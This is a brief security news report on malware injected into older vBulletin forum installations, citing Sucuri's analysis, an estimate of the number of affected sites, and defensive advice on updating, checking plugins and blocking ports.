14 DAY TRIAL // As many as 150,000 websites powered by the popular vBulletin forum platform might have been hacked and abused to serve malware to their visitors.
Experts from Sucuri have found that cybercriminals are exploiting serious vulnerabilities in older versions of vBulletin to hijack the forums.
“[The malware] uses the Plugin system and hooks into ‘global_start’, so it is called on every page request,” Sucuri CTO Daniel Cid explained in a blog post.
The PHP code that’s injected is designed to contact front.adabeupdate.com and retrieve content from it.
“This allows the malware to be injected to the forum pages and pushed down to the visitors of the web site via iFrames. The content is all remotely generated, changing very often, but the format is always the same,” Cid added.
The size of the campaign has been determined based on the number of sites found by Google to contain a certain error during a period when the server that hosted one of the malicious domains was taken down.
Google indexed over 15,000 pages, but since not all sites have “display_errors” enabled, experts estimate that the total number of compromised websites could be at least 10 times higher.
So how can you protect yourself against such attacks? The most important thing is to make sure your vBulletin installation is always up to date.
In addition, users are advised to check their template and plugin lists to make sure there aren’t any malicious components. Sucuri’s website scanner is a great tool to check if a website has been compromised.
Also, since the malicious iFrames always use ports 36 and 38, Internet service providers (ISPs) can protect their customers by blocking the two ports externally.